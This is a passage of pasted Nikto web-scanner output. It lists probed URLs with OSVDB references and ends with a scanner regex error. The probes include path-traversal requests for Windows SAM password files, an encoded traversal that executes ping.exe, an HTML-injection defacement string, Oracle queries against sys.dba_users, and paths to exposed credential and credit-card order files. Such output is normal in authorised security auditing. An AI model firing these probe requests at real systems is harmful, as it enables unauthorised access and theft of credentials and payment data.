  579. + OSVDB-17671: /siteserver/publishing/viewcode.asp?source=/default.asp: May be able to view source code using Site Server vulnerability.
  580. + OSVDB-4908: /securelogin/1,2345,A,00.html: Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer overflow.
  581. + OSVDB-5092: /config.inc: DotBr 0.1 configuration file includes usernames and passwords.
  582. + OSVDB-5095: /sysuser/docmgr/ieedit.stm?url=../: Sambar default file may allow directory listings.
  583. + OSVDB-5096: /sysuser/docmgr/iecreate.stm?template=../: Sambar default file may allow directory listings.
  584. + OSVDB-539: /catinfo: May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.
  585. + OSVDB-5407: /soap/servlet/soaprouter: Oracle 9iAS SOAP components allow anonymous users to deploy applications by default.
  586. + OSVDB-6659: /rk4MzSSRx5l0mN6ccf5NszHRH8cgzT3AMVGnaeEJJaut32JaKrG82VC2orodLsEKcUdamJbaZhSxgdxkF6ff4kVT3EVsRwLQ3FjmNpEsNZDneD7iYlIHXTg4ecKJrUCAt4srhIfOFsXd6xH1KUyLm6YzPfKkMdtcs9LVU59pDIU3hxzKK1wBRZmaJiH5f6ij7OVzuacI3ivF4pdryqSpc1PU0Cu6mcy<font%20size=50>DEFACED<!--//--: MyWebServer 1.0.2 is vulnerable to HTML injection. Upgrade to a later version.
  587. + OSVDB-5523: /MWS/HandleSearch.html?searchTarget=test&B1=Submit: MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server.
  588. + OSVDB-562: /server-info: This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.
  589. + OSVDB-5709: /.nsconfig: Contains authorization information
  590. + OSVDB-583: /cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1: Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0011.
  591. + OSVDB-596: /dc/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
  592. + OSVDB-596: /dc/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
  593. + OSVDB-596: /dcshop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
  594. + OSVDB-596: /dcshop/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
  595. + OSVDB-6666: /cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS.
  596. + OSVDB-6670: /applist.asp: Citrix server may allow remote users to view applications installed without authenticating.
  597. + OSVDB-6671: /launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica: Citrix server may reveal sensitive information by accessing the 'advanced' tab on hte login screen.
  598. + OSVDB-6672: /_layouts/alllibs.htm: Microsoft SharePoint Portal and Team Serices vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by [email protected]
  599. + OSVDB-6672: /_layouts/settings.htm: Microsoft SharePoint Portal and Team Serices vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by [email protected]
  600. + OSVDB-6672: /_layouts/userinfo.htm: Microsoft SharePoint Portal and Team Serices vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by [email protected]
  601. + OSVDB-670: /stronghold-info: Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. This gives information on configuration. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0868.
  602. + OSVDB-670: /stronghold-status: Redhat Stronghold from versions 2.3 up to 3.0 disclose sensitive information. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0868.
  603. + OSVDB-7: /iissamples/exair/howitworks/Code.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
  604. + OSVDB-7: /iissamples/exair/howitworks/Codebrw1.asp: This is a default IIS script/file which should be removed, it may allow a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0738. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
  605. + OSVDB-707: /globals.jsa: Oracle globals.jsa file
  606. + OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  607. + OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  608. + OSVDB-721: /..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  609. + OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  610. + OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  611. + OSVDB-721: /..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  612. + OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../windows/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  613. + OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  614. + OSVDB-721: /..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._: BadBlue server is vulnerable to multiple remote exploits. See http://www.securiteam.com/exploits/5HP0M2A60G.html for more information.
  615. + OSVDB-789: /iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0739. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
  616. + OSVDB-9624: /pass_done.php: PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords.
  617. + OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
  618. + OSVDB-3092: /README: README file found.
  619. + OSVDB-3233: /j2ee/: j2ee directory found--possibly an Oracle app server directory.
  620. + OSVDB-3233: /WebCacheDemo.html: Oracle WebCache Demo
  621. + OSVDB-32333: /webcache/: Oracle WebCache Demo
  622. + OSVDB-3233: /webcache/webcache.xml: Oracle WebCache Demo
  623. + OSVDB-3233: /bmp/: SQLJ Demo Application
  624. + OSVDB-3233: /bmp/global-web-application.xml: SQLJ Demo Application
  625. + OSVDB-3233: /bmp/JSPClient.java: SQLJ Demo Application
  626. + OSVDB-3233: /bmp/mime.types: SQLJ Demo Application
  627. + OSVDB-3233: /bmp/README.txt: SQLJ Demo Application
  628. + OSVDB-3233: /bmp/sqljdemo.jsp: SQLJ Demo Application
  629. + OSVDB-3233: /bmp/setconn.jsp: SQLJ Demo Application
  630. + OSVDB-3233: /ptg_upgrade_pkg.log: Oracle log file
  631. + OSVDB-3233: /OA_HTML/oam/weboam.log: Oracle log files.
  632. + OSVDB-3233: /webapp/admin/_pages/_bc4jadmin/: Oracle JSP files
  633. + OSVDB-3233: /_pages/_webapp/_admin/_showpooldetails.java: Oracle JSP files
  634. + OSVDB-3233: /_pages/_webapp/_admin/_showjavartdetails.java: Oracle JSP file
  635. + OSVDB-3233: /_pages/_demo/: Oracle JSP file
  636. + OSVDB-3233: /_pages/_webapp/_jsp/: Oracle JSP file.
  637. + OSVDB-3233: /_pages/_demo/_sql/: Oracle JSP file.
  638. + OSVDB-3233: //OA_HTML/_pages/: Oracle JSP file.
  639. + OSVDB-3233: /OA_HTML/webtools/doc/index.html: Cabo DHTML Components Help Page
  640. + OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
  641. + OSVDB-3233: /apex/: Oracle Application Express login screen.
  642. + OSVDB-3233: /OA_JAVA/: Oracle Applications Portal Page
  643. + OSVDB-3233: /OA_HTML/: Oracle Applications Portal Page
  644. + OSVDB-3233: /aplogon.html: Oracle Applications Portal Page
  645. + OSVDB-3233: /appdet.html: Oracle Applications Portal Pages
  646. + OSVDB-3233: /servlets/weboam/oam/oamLogin: Oracle Application Manager
  647. + OSVDB-3233: /OA_HTML/PTB/mwa_readme.htm: Oracle Mobile Applications Industrial Server administration and configuration inerface
  648. + OSVDB-3233: /reports/rwservlet: Oracle Reports
  649. + OSVDB-3233: /reports/rwservlet/showenv: Oracle Reports
  650. + OSVDB-3233: /reports/rwservlet/showmap: Oracle Reports
  651. + OSVDB-3233: /reports/rwservlet/showjobs: Oracle Reports
  652. + OSVDB-3233: /reports/rwservlet/getjobid7?server=myrep: Oracle Reports
  653. + OSVDB-3233: /reports/rwservlet/getjobid4?server=myrep: Oracle Reports
  654. + OSVDB-3233: /reports/rwservlet/showmap?server=myserver: Oracle Reports
  655. + OSVDB-3093: /pls/portal/owa_util.cellsprint?p_theQuery=select: Direct access to Oracle packages could have an unkown impact.
  656. + OSVDB-3093: /pls/portal/owa_util.listprint?p_theQuery=select: Access to Oracle pages cold have an unknown impact.
  657. + OSVDB-3093: /pls/portal/owa_util.show_query_columns?ctable=sys.dba_users: Access to Oracle pages cold have an unknown impact.
  658. + OSVDB-3093: /pls/portal/owa_util.showsource?cname=owa_util: Access to Oracle pages cold have an unknown impact.
  659. Nested quantifiers in regex; marked by <-- HERE in m/^//pls/portal/owa_util.cellsprint?p_theQuery=select+* <-- HERE +from+sys.dba_users\??/ at /var/lib/nikto/plugins/nikto_core.plugin line 332, <IN> line 451.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!